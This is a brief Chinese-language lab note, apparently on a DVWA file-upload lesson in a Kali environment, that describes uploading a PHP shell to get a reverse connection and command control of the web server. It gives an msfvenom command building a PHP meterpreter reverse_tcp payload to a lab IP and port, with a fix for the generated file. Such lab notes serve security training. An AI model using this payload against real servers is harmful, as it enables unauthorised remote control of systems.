http://www.computersecuritystudent.com/SECURITY_TOOLS/DVWA/DVWAv107/lesson8/
环境为kali2 dvwa1.9
结果:上传的shell反向连接控制主机,控制主机可输入各种命令操作受控WEB服务器
需要更正的地方
Section 8: Build PHP msfpayload
msfvenom -p php/meterpreter/reverse_tcp LHOST=172.19.180.28 LPORT=4444 R > PHONE_HOME.php
删除此PHONE_HOME.php文件下的/*和/**/